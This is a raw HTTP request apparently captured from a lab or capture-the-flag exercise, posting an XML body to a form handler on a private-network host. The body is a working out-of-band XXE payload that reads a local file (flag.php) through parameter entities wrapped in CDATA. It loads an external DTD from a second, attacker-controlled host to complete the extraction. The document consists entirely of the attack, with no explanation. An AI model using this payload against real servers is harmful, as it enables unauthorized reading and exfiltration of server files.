POST /submitDetails.php HTTP/1.1

Host: 10.129.52.96

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Content-Type: text/plain;charset=UTF-8

Content-Length: 327

Origin: http://10.129.52.96

Connection: Close

Referer: http://10.129.52.96/



<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE email [

  <!ENTITY % begin "<![CDATA["> 

  <!ENTITY % file SYSTEM "file:////flag.php">

  <!ENTITY % end "]]>">

  <!ENTITY % xxe SYSTEM "http://10.10.15.70:8000/xxe.dtd">

  %xxe;

]>
<root>
<name>

test</name>
<tel></tel>
<email>&joined;</email>
<message></message>
</root>
